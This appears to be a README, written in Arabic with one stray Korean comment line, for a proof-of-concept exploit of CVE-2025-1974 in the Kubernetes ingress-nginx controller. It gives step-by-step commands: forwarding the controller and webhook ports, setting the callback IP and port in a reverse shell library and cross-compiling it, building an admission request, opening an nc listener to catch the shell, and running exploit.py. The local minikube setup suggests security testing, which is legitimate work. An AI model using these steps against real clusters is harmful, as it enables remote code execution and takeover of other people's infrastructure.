
كود PoC لـ CVE-2025-1974
قم بتثبيت minikube للاختبار المحلي
minikube start --driver=docker
قم بإعداد ingress-nginx-controller باستخدام الأمر التالي
kubectl apply -f ingress-nginx-controller.yml
تحقق من أن الـ Pods تعمل بشكل صحيح
kubectl get pods -n ingress-nginx
kubectl describe <pod name> -n ingress-nginx
قم بإعادة توجيه منفذي 80 و8443 (webhook) الخاصين بالـ Pods إلى المنفذين المحليين 8888 و1337 (يلزم إعادة توجيه المنفذين 80 و8443 معًا)
kubectl port-forward -n ingress-nginx <pod name> 8888:80
kubectl port-forward -n ingress-nginx <pod name> 1337:8443
قم بتعديل IP والمنفذ اللذين يتصل بهما الـ reverse shell في ملف rev_shell.c
يلزم الترجمة في بيئة MacOS (arm64)، ويجب أن تكون الترجمة مناسبةً للبيئة التي سيُجرى فيها الاختبار
aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu
قم بالتحويل إلى صيغة AdmissionReview باستخدام kube-review (json)
./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json
جهّز اتصال الـ reverse shell باستخدام nc
nc -lv 4444
عدّل الـ host والـ port الخاصين بـ nginx وwebhook في ملف exploit.py ثم نفّذ
python3 exploit.py
